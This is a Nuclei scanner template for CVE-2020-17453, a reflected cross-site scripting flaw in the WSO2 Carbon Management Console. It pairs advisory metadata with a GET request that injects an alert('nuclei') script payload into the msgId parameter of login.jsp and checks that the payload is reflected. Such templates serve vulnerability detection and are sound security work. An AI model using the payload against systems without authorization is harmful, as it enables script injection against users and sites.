nuclei-templates/http/cves/2020/CVE-2020-17453.yaml

45 lines
1.3 KiB
YAML

id: CVE-2020-17453
info:
name: WSO2 Carbon Management Console <=5.10 - Cross-Site Scripting
author: madrobot
severity: medium
description: WSO2 Management Console through 5.10 is susceptible to reflected cross-site scripting which can be exploited by tampering a request parameter in Management Console. This can be performed in both authenticated and unauthenticated requests.
reference:
- https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-1132
- https://nvd.nist.gov/vuln/detail/CVE-2020-17453
- https://twitter.com/JacksonHHax/status/1374681422678519813
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-17453
cwe-id: CWE-79
epss-score: 0.01736
cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wso2
product: api_manager
tags: xss,wso2,cve2020,cve
http:
- method: GET
path:
- '{{BaseURL}}/carbon/admin/login.jsp?msgId=%27%3Balert(%27nuclei%27)%2F%2F'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "'';alert('nuclei')//';"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200